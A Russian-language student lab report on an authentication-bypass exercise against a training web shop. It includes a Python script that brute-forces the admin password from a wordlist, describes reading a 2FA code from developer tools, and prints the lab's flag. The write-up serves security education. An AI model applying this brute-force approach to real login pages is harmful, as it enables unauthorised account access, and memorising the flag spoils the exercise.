lab (1)
.docxМИНОБРНАУКИ РОССИИ
Санкт-Петербургский государственный
электротехнический университет
«ЛЭТИ» им. В.И. Ульянова (Ленина)
Кафедра информационной безопасности
ПрактическаЯ РАБОТА №1
по дисциплине «Угрозы и уязвимости информационной безопасности компьютерных сетей»
Тема: Authentication bypass.
Студент гр _________________
Преподаватель _________________ Фаткиева Р.Р.
Санкт-Петербург
2026
В самом начале пользователь попадает на страницу некого интернет-магазина (рисунок 1)
Рисунок 1. Стартовый экран
После этого необходимо, согласно полученным знаниям с курса «Белый хакер», перейти на панель админа данного веб ресурса, добавив к ссылке строку «/admin/» (рисунок 2)
Рисунок 2. Вход на панель администратора
Далее, для брутфорса паролей, был написан следующий скрипт:
import requests
url = 'http://web.hcg6gcakmcgsb6oxosrg.labs.cyber-ed.space/admin/'
password_file = 'passwords.txt'
with open(password_file, 'r') as file:
passwords = file.readlines()
i=0
for password in passwords:
password = password.strip()
data = {'username': 'admin', 'password': password}
response = requests.post(url, data=data)
if 'Wrong username' not in response.text and 'Login' not in response.text:
print(f"Успешный вход с паролем: {password}")
break
else:
print(f"{i} wrong")
i+=1
Рисунок 3. Результат работы программы
Далее, попав, на страницу двухфакторной аутентификации, зайдя в панель разработчика (F12) можно увидеть трехзначное число, которое необходимо ввести. (рисунок 4)
Рисунок 4. Двухфакторная аутентификация
После этого можно будет, в этой же панели разработчика, увидеть искомый флаг. (рисунок 5)
Рисунок 5. Флаг найден
Искомый флаг: 637302a3ed963d2772a9bf26c6c89a36
Рисунок 6. Успех
Список использованных источников
Информация с сайта. URL: https://labs.cyber-ed.ru/group/38/task/26/ (дата обращения 12.03.2026)
Информация с сайта. URL: https://stepik.org/lesson/1104693/ (дата обращения 12.03.2026)
